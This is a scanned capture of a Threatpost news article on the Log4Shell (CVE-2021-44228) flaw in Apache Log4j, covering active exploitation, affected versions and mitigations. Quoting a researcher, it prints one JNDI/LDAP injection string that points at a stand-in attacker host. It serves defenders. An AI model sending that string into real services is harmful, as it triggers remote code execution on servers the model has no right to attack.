threatpost.com
Open in
urlscan Pro
35.173.160.135
Public Scan
URL:
https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
Submission Tags: falconsandbox
Submission: On December 11 via api from US — Scanned from DE
Submission Tags: falconsandbox
Submission: On December 11 via api from US — Scanned from DE
Form analysis 4 forms found in the DOM
POST /zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/#gf_5
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_5" id="gform_5" action="/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/#gf_5">
<div class="gform_body">
<ul id="gform_fields_5" class="gform_fields top_label form_sublabel_below description_below">
<li id="field_5_8" class="gfield field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label" for="input_5_8"></label>
<div class="ginput_container ginput_container_text"><input name="input_8" id="input_5_8" type="text" value="" class="medium" placeholder="Your name" aria-invalid="false"></div>
</li>
<li id="field_5_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label" for="input_5_1"><span class="gfield_required">*</span></label>
<div class="ginput_container ginput_container_email">
<input name="input_1" id="input_5_1" type="text" value="" class="medium" placeholder="Your e-mail address" aria-required="true" aria-invalid="false">
</div>
</li>
<li id="field_5_9" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden"><input name="input_9" id="input_5_9" type="hidden" class="gform_hidden"
aria-invalid="false" value=""></li>
<li id="field_5_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label"><span class="gfield_required">*</span></label>
<div class="ginput_container ginput_container_checkbox">
<ul class="gfield_checkbox" id="input_5_2">
<li class="gchoice_5_2_1">
<input name="input_2.1" type="checkbox" value="I agree" id="choice_5_2_1">
<label for="choice_5_2_1" id="label_5_2_1">I agree to my personal data being stored and used to receive the newsletter</label>
</li>
</ul>
</div>
</li>
<li id="field_5_5" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label"><span class="gfield_required">*</span></label>
<div class="ginput_container ginput_container_checkbox">
<ul class="gfield_checkbox" id="input_5_5">
<li class="gchoice_5_5_1">
<input name="input_5.1" type="checkbox" value="I agree" id="choice_5_5_1">
<label for="choice_5_5_1" id="label_5_5_1">I agree to accept information and occasional commercial offers from Threatpost partners</label>
</li>
</ul>
</div>
</li>
<li id="field_5_10" class="gfield gform_validation_container field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label" for="input_5_10">Name</label>
<div class="ginput_container"><input name="input_10" id="input_5_10" type="text" value=""></div>
<div class="gfield_description" id="gfield_description__10">This field is for validation purposes and should be left unchanged.</div>
</li>
</ul>
</div>
<div class="gform_footer top_label"> <input type="submit" id="gform_submit_button_5" class="gform_button button" value="Subscribe" onclick="if(window["gf_submitting_5"]){return false;} window["gf_submitting_5"]=true; "
onkeypress="if( event.keyCode == 13 ){ if(window["gf_submitting_5"]){return false;} window["gf_submitting_5"]=true; jQuery("#gform_5").trigger("submit",[true]); }" style="display: none;"> <input
type="hidden" name="gform_ajax" value="form_id=5&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_5" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="5">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_5" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_5" id="gform_target_page_number_5" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_5" id="gform_source_page_number_5" value="1">
<input type="hidden" name="gform_field_values" value="">
</div>
</form>GET https://threatpost.com/
<form class="c-site-search__form" role="search" method="get" action="https://threatpost.com/">
<input type="text" class="c-site-search__field" name="s" placeholder="Search">
<button type="submit" class="c-button c-button--secondary c-button--smaller c-site-search__button" value="Search"><svg class="icon fill">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://threatpost.com/wp-content/themes/threatpost-2018/assets/sprite/icons.svg#icon-search"></use>
</svg> Search</button>
<div class="c-site-search__overlay"></div>
</form>POST https://threatpost.com/wp-comments-post.php
<form action="https://threatpost.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
<div class="o-row">
<div class="o-col-12@md">
<div class="c-form-element"><textarea id="comment" name="comment" cols="45" rows="8" aria-required="true" placeholder="Write a reply..."></textarea></div>
</div>
</div>
<div class="o-row">
<div class="o-col-6@md">
<div class="c-form-element"><input id="author" name="author" placeholder="Your name" type="text" value="" size="30"></div>
</div>
<div class="o-col-6@md">
<div class="c-form-element"><input id="email" name="email" placeholder="Your email" type="text" value="" size="30"></div>
</div>
</div>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="c-button c-button--primary" value="Send Comment"> <input type="hidden" name="comment_post_ID" value="176937" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="291a6fb43d"></p><!-- the following input field has been added by the Honeypot Comments plugin to thwart spambots -->
<input type="hidden" id="M77HBzVdsj4IJpGd9eQfIBKSY" name="azVRslHeYYoGBGYEr4mCjAyuP">
<script type="text/javascript">
document.addEventListener("input", function(event) {
if (!event.target.closest("#comment")) return;
var captchaContainer = null;
captchaContainer = grecaptcha.render("recaptcha-submit-btn-area", {
"sitekey": "6LfsdrAaAAAAAMVKgei6k0EaDBTgmKv6ZQrG7aEs",
"theme": "standard"
});
});
</script>
<script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async="" defer=""></script>
<div id="recaptcha-submit-btn-area"> </div>
<noscript>
<style type="text/css">
#form-submit-save {
display: none;
}
</style>
<input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment">
</noscript><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea><input type="hidden" id="ak_js" name="ak_js" value="1639262204375">
</form>GET https://threatpost.com/
<form class="c-site-search__form" role="search" method="get" action="https://threatpost.com/">
<input type="text" class="c-site-search__field" name="s" placeholder="Search">
<button type="submit" class="c-button c-button--secondary c-button--smaller c-site-search__button" value="Search"><svg class="icon fill">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://threatpost.com/wp-content/themes/threatpost-2018/assets/sprite/icons.svg#icon-search"></use>
</svg> Search</button>
<div class="c-site-search__overlay"></div>
</form>Text Content
Newsletter
SUBSCRIBE TO OUR THREATPOST TODAY NEWSLETTER
Join thousands of people who receive the latest breaking cybersecurity news
every day.
The administrator of your personal data will be Threatpost, Inc., 500 Unicorn
Park, Woburn, MA 01801. Detailed information on the processing of personal data
can be found in the privacy policy. In addition, you will find them in the
message confirming the subscription to the newsletter.
*
* *
*
* *
* I agree to my personal data being stored and used to receive the
newsletter
* *
* I agree to accept information and occasional commercial offers from
Threatpost partners
* Name
This field is for validation purposes and should be left unchanged.
This iframe contains the logic required to handle Ajax powered Gravity Forms.
The administrator of your personal data will be Threatpost, Inc., 500 Unicorn
Park, Woburn, MA 01801. Detailed information on the processing of personal data
can be found in the privacy policy. In addition, you will find them in the
message confirming the subscription to the newsletter.
Threatpost
* Cloud Security
* Malware
* Vulnerabilities
* InfoSec Insiders
* Webinars
*
*
*
*
*
*
*
Search
* Sprawling Active Attack Aims to Take Over 1.6M WordPress SitesPrevious
article
* ‘Appalling’ Riot Games Job Fraud Takes Aim at WalletsNext article
ZERO DAY IN UBIQUITOUS APACHE LOG4J TOOL UNDER ACTIVE ATTACK
Author: Lisa Vaas
December 10, 2021 12:58 pm
7 minute read
Write a comment
Share this article:
*
*
The Log4Shell vulnerability critically threatens anybody using the popular
open-source Apache Struts framework and could lead to a “Mini internet meltdown
soonish.”
An excruciating, easily exploited flaw in the ubiquitous Java logging library
Apache Log4j could allow unauthenticated remote code execution (RCE) and
complete server takeover — and it’s being exploited in the wild.
The flaw first turned up on sites that cater to users of the world’s favorite
game, Minecraft, on Thursday. The sites reportedly warned that attackers could
unleash malicious code on either servers or clients running the Java version of
Minecraft by manipulating log messages, including from text typed into chat
messages.
The same day, the as-yet-unpatched flaw was dubbed “Log4Shell” by LunaSec and
began being tracked as CVE-2021-44228.
By early Friday morning, the Cyber Emergency Response Team (CERT) of the
Deutsche Telekom Group tweeted that it was seeing attacks on its honeypots
coming from the Tor network as threat actors tried to exploit the new bug,
Ditto for CERT New Zealand; and all day, people have piped up on Twitter to warn
that they’re also seeing in-the-wild exploits.
This problem is going to cause a mini-internet meltdown, experts said, given
that Log4j is incorporated into scads of popular frameworks, including Apache
Struts2, Apache Solr, Apache Druid and Apache Flink. That exposes an
eye-watering number of third-party apps that may also be vulnerable to the same
type of high-severity exploits as that spotted in Minecraft, as well as in cloud
services such as Steam and Apple iCloud, LunaSec warned.
As of Friday, version 2.15.0 had been released: log4j-core.jar is available on
Maven Central here, with release notes are available here and Apache’s Log4j
security announcements available here.
‘MINI-INTERNET MELTDOWN’ IMMINENT?
Even though an initial fix was rushed out on Friday, it’s going to take time to
trickle down to all of those projects, given how extensively the logging library
is incorporated downstream.
“Expect a mini-internet meltdown soonish,” said British security specialist
Kevin Beaumont, who tweeted that the fix “needs to flow downstream to Apache
Struts2, Solr, Linux distributions, vendors, appliances etc.”
Just one example of the bug’s massive reach: On Friday morning, Rob Joyce,
director of cybersecurity at the National Security Agency (NSA), tweeted that
even the NSA’s GHIDRA – a suite of reverse-engineering tools developed by NSA’s
Research Directorate – includes the buggy Log4j library.
> “The Log4j vulnerability is a significant threat for exploitation due to the
> widespread inclusion in software frameworks, even NSA’s GHIDRA. This is a case
> study in why the software bill of material (SBOM) concepts are so important to
> understand exposure.” — Rob Joyce, NSA Director of Cybersecurity.
MAX CVSS SCORE OF 10
The bug find has been credited to Chen Zhaojun of Alibaba. It’s been assigned
the maximum CVSS score of 10, given how relatively easy it is to exploit,
attackers’ ability to seize control of targeted servers and the ubiquity of
Log4j. According to CERT Austria, the security hole can be exploited by simply
logging a special string.
Researchers told Ars Technica that Log4Shell is a Java deserialization bug that
stems from the library making network requests through the Java Naming and
Directory Interface (JNDI) to an LDAP server and executing any code that’s
returned. It’s reportedly triggered inside of log messages with use of the ${}
syntax.
“JNDI triggers a look-up on a server controlled by the attacker and executes the
returned code,” according to CERT Austria’s advisory, posted Friday, which noted
that code for an exploit proof-of-concept (PoC) was published on GitHub.
The internet’s reaction: “Umm, yikes.”
“This Log4j (CVE-2021-44228) vulnerability is extremely bad,” tweeted security
expert Marcus Hutchins. “Millions of applications use Log4j for logging, and all
the attacker needs to do is get the app to log a special string.”
JAVAGEDDON
Security researchers don’t want to say that the sky is falling, per se, but.
well, it is. They’re comparing this scenario to Shellshock with regards to its
huge potential severity. Aka Bashdoor, Shellshock was a family of security bugs
in the Unix Bash shell present in almost all Linux, UNIX and Mac OS X
deployments. Within hours of its initial disclosure in 2014, it was being
exploited by botnets of compromised computers to perform distributed
denial-of-service (DDoS) attacks and vulnerability scanning.
Security researchers are considering Log4Shell to be much like Shellshock with
regards to the enormous attack surface it poses. John Hammond, Senior Security
Researcher at Huntress, who created a PoC for Log4Shell, predicted that threat
actors will likely include payloads in simple HTTP connections, either in a
User-Agent header or trivial POST form data.
“Organizations are already seeing signs of exploitation in the wild, and
adversaries will just spray-and-pray across the internet,” he told Threatpost
via email on Friday. This isn’t a targeted attack, he noted, given that “there
is no target.”
He recommended that organizations actively using Apache log4j “absolutely must
upgrade to log4j-2.1.50-rc2 as soon as possible.”
Hammond shared this growing list of software and components vulnerable to
Log4Shell that’s being cultivated on GitHub.
AFFECTED VERSIONS
On Thursday, LunaSec explained that affected versions are 2.0 <= Apache log4j <=
2.14.1.
It added that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren’t
affected by the LDAP attack vector, given that in those versions,
“com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot
load a remote codebase using LDAP.”
Vulnerability also depends on specific configurations. But there are “other
attack vectors targeting this vulnerability which can result in RCE,” LunaSec
continued. “Depending on what code is present on the server, an attacker could
leverage this existing code to execute a payload,” pointing to a Veracode post
on an attack targeting the class org.apache.naming.factory.BeanFactory that’s
present on Apache Tomcat servers.
LunaSec concluded that, “given how ubiquitous this library is, the impact of the
exploit (full server control), and how easy it is to exploit, the impact of this
vulnerability is quite severe.”
Organizations can tell if they’re affected by examining log files for services
using affected Log4j versions. If they contain user-controlled strings – CERT-NZ
uses the example of “Jndi:ldap” – they could be affected.
“If you believe you may be impacted by CVE-2021-44228, Randori encourages all
organizations to adopt an assumed breach mentality and review logs for impacted
applications for unusual activity,” cybersecurity researchers at Randori wrote
in a blog post.
Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, noted
that a workaround released to address the flaw, which comes as part of Log4j
version 2.15.0; reportedly changes a system setting from “false” to “true” by
default.
Don’t change that, he warned: users who change the setting back to “false”
remain vulnerable to attack, and as a result, “it is highly recommended that
this is not returned to its previous setting.,” he told Threatpost on Friday.
“Given the scale of affected devices and exploitability of the bug, it is highly
likely to attract considerable attention from both cybercriminals and
nation-state-associated actors. Organizations are advised to update to version
2.15.0 and place additional vigilance on logs associated with susceptible
applications.”
TEMPORARY MITIGATION
To keep the library from being exploited, it’s urgently recommended that Log4j
versions are upgraded to log4j-2.15.0-rc1.
But for those who can’t update straight off, LunaSec pointed to a discussion on
HackerNews regarding a mitigation strategy available in version 2.10.0 and
higher of Log4j that was posted in the early hours of Friday morning.
For versions older than 2.10.0 that can’t be upgraded, these mitigation choices
have been suggested:
* Modify every logging pattern layout to say %m{nolookups} instead of %m in
your logging config files (here are Apache’s details); or,
* Substitute a non-vulnerable or empty implementation of the class
org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your
classloader uses your replacement instead of the vulnerable version of the
class. Refer to your application’s or stack’s classloading documentation to
understand this behavior; or
* Users should switch log4j2.formatMsgNoLookups to true by
adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the
application.
HOW THE VULNERABILITY WORKS
The Huntress ThreatOps team has published details on the vulnerability’s impact
and advice on what organizations should do next. Expect it and other reports to
be updated as the situation unfolds.
Huntress researchers said that the attack vector is “extremely trivial” for
threat actors. As has been noted, it takes just a single text string to trigger
an application to reach out to an external location if it’s logged via the
vulnerable instance of log4j.
As Hammond told Threatpost, a possible exploit could entail a threat actor
supplying special text in an HTTP User-Agent header or a simple POST form
request, with the usual form:
${jndi:ldap://maliciousexternalhost.com/resource
…where maliciousexternalhost.com is an instance controlled by the adversary.
The log4j vulnerability parses the input and reaches out to the malicious host
via the JNDI. “The first-stage resource acts as a springboard to another
attacker-controlled endpoint, which serves Java code to be executed on the
original victim,” according to Huntress. “Ultimately, this grants the adversary
the opportunity to run any code they would like on the target: remote code
execution.”
STOP, DROP, HUNT IT DOWN
So much for baking Christmas cookies: It’s going to be a long weekend for a lot
of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it
“a worst-case scenario.”
“The combination of log4j’s ubiquitous use in software and platforms, the many,
many paths available to exploit the vulnerability, the dependencies that will
make patching this vulnerability without breaking other things difficult, and
the fact that the exploit itself fits into a tweet,” he told Threatpost on
Friday via email.
First things first, he said, “stop what you’re doing as a software shop and
enumerate where log4j exists and might exist in your environment and products.”
He noted that it’s the kind of software “that can quite easily be there without
making its presence obvious, so we expect the tail of exploitability on this
vulnerability to be quite long.”
Tim Wade, technical director of the CTO team at Vectra, told Threatpost that the
specifics of how attacks will play out are “still a bit open-ended.” But given
the widespread use and position of the underlying software, he said, “it
absolutely looks like a good candidate for malicious network ingress, which
means network defenders should be on guard for suspicious outbound traffic that
may indicate command-and-control.”
Wade said this is an example of how critical effective detection and response
capabilities are, and “really exposes how risky the ‘prevent, patch, and pray’
strategy that’s so widely adopted in legacy security programs really is.”
John Bambenek, principal threat hunter at Netenrich, said that mitigations
should be applied ASAP, including updating Java. He told Threatpost that Web
application firewalls should also be updated with an appropriate rule to block
such attacks.
121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and
Casey Ellis.
There’s a sea of unstructured data on the internet relating to the latest
security threats. REGISTER TODAY to learn key concepts of natural language
processing (NLP) and how to use it to navigate the data ocean and add context to
cybersecurity threats (without being an expert!). This LIVE, interactive
Threatpost Town Hall, sponsored by Rapid 7, will feature security researchers
Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus
Threatpost journalist and webinar host, Becky Bracken.
Register NOW for the LIVE event!
Write a comment
Share this article:
* Cloud Security
* Government
* Hacks
* News
* Vulnerabilities
* Web Security
SUGGESTED ARTICLES
NEXT-GEN MALDOCS & HOW TO SOLVE THE HUMAN VULNERABILITY
Malicious email attachments with macros are one of the most common ways hackers
get in through the door. Huntress security researcher John Hammond discusses how
threat hunters can fight back.
December 10, 2021
‘APPALLING’ RIOT GAMES JOB FRAUD TAKES AIM AT WALLETS
Scammers are using fake job listings to empty the wallets of young, hopeful
victims looking to break into the gaming industry.
December 10, 2021
SPRAWLING ACTIVE ATTACK AIMS TO TAKE OVER 1.6M WORDPRESS SITES
Cyberattackers are targeting security vulnerabilities in four plugins plus
Epsilon themes, to assign themselves administrative accounts.
December 10, 2021
DISCUSSION
LEAVE A COMMENT CANCEL REPLY
This site uses Akismet to reduce spam. Learn how your comment data is processed.
INFOSEC INSIDER
* NEXT-GEN MALDOCS & HOW TO SOLVE THE HUMAN VULNERABILITY
December 10, 2021
* NOT WITH A BANG BUT A WHISPER: THE SHIFT TO STEALTHY C2
December 8, 2021
* ARE YOU GUILTY OF THESE 8 NETWORK-SECURITY BAD PRACTICES?
December 6, 2021
* PANDEMIC-INFLUENCED CAR SHOPPING: JUST USE THE MANUFACTURER API
December 3, 2021
* HOW DECRYPTION OF NETWORK TRAFFIC CAN IMPROVE SECURITY
November 30, 2021
3
Newsletter
SUBSCRIBE TO THREATPOST TODAY
Join thousands of people who receive the latest breaking cybersecurity news
every day.
Subscribe now
Twitter
There’s a sea of unstructured data on the internet relating to the latest
#cybersecurity threats. Join Threatpost’s… https://t.co/y6ZfyTh5I0
1 day ago
NEXT 00:03 01:22 360p 720p HD 1080p HD Auto (360p) About Connatix V142093 Closed
Captions About Connatix V142093 1/1 Skip Ad Continue watching This Day in
History after the ad Visit Advertiser website GO TO PAGE
SUBSCRIBE TO OUR NEWSLETTER, THREATPOST TODAY!
Get the latest breaking news delivered daily to your inbox.
Subscribe now
Threatpost
The First Stop For Security News
* Home
* About Us
* Contact Us
* Advertise With Us
* RSS Feeds
* Copyright © 2021 Threatpost
* Privacy Policy
* Terms and Conditions
* Advertise
*
*
*
*
*
*
*
TOPICS
* Black Hat
* Breaking News
* Cloud Security
* Critical Infrastructure
* Cryptography
* Facebook
* Government
* Hacks
* IoT
* Malware
* Mobile Security
* Podcasts
* Privacy
* RSAC
* Security Analyst Summit
* Videos
* Vulnerabilities
* Web Security
Threatpost
*
*
*
*
*
*
*
TOPICS
* Cloud Security
* Malware
* Vulnerabilities
* Privacy
Show all
* Black Hat
* Critical Infrastructure
* Cryptography
* Facebook
* Featured
* Government
* Hacks
* IoT
* Mobile Security
* Podcasts
* RSAC
* Security Analyst Summit
* Slideshow
* Videos
* Web Security
AUTHORS
* Tara Seals
* Tom Spring
* Lisa Vaas
THREATPOST
* Home
* About Us
* Contact Us
* Advertise With Us
* RSS Feeds
Search
*
*
*
*
*
*
*
InfoSec Insider
INFOSEC INSIDER POST
Infosec Insider content is written by a trusted community of Threatpost
cybersecurity subject matter experts. Each contribution has a goal of bringing a
unique voice to important cybersecurity topics. Content strives to be of the
highest quality, objective and non-commercial.
Sponsored
SPONSORED CONTENT
Sponsored Content is paid for by an advertiser. Sponsored content is written and
edited by members of our sponsor community. This content creates an opportunity
for a sponsor to provide insight and commentary from their point-of-view
directly to the Threatpost audience. The Threatpost editorial team does not
participate in the writing or editing of Sponsored Content.
We use cookies to make your experience of our websites better. By using and
further navigating this website you accept this. Detailed information about the
use of cookies on this website is available by clicking on more information.
ACCEPT AND CLOSE